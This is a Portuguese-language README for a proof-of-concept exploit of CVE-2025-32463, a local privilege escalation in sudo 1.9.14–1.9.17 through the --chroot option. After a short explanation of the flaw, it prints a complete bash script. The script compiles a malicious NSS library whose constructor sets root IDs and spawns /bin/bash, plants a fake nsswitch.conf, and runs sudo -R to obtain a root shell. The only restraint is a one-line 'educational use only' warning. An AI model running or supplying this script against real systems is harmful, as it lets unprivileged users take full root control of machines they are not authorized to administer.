
Prova de conceito de exploit para CVE-2025-32463, uma escalada local de privilégios no sudo 1.9.14-1.9.17 por meio de configuração incorreta de chroot e injeção de biblioteca NSS maliciosa.
--chrootID do ExploitDB: 52352
Este repositório documenta uma vulnerabilidade crítica de escalada local de privilégios (LPE) que afeta as versões Sudo 1.9.14 – 1.9.17.
A vulnerabilidade decorre da implementação incorreta da opção sudo -R (--chroot), que permite ao atacante executar comandos com privilégios de root, mesmo sem permissão no arquivo sudoers.
🔥 Resultado: Um usuário não autorizado → root shell
O parâmetro --chroot (-R) do sudo permite ao usuário executar comandos sob um diretório raiz definido por ele mesmo.
No entanto, como resultado de uma alteração feita no sudo 1.9.14:
sudoers ainda não foi totalmente validadochroot() é feita utilizando o diretório especificado pelo usuárioEssa condição faz com que o atacante, por meio de um arquivo falso criado por ele mesmo:
/etc/nsswitch.conf
carregue uma biblioteca NSS maliciosa (libnss_*.so) com privilégios de root.
nsswitch.conf falso é preparadosudo -R <dir> <command> é executada⚠️ Utilize apenas em ambientes educacionais e de teste
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot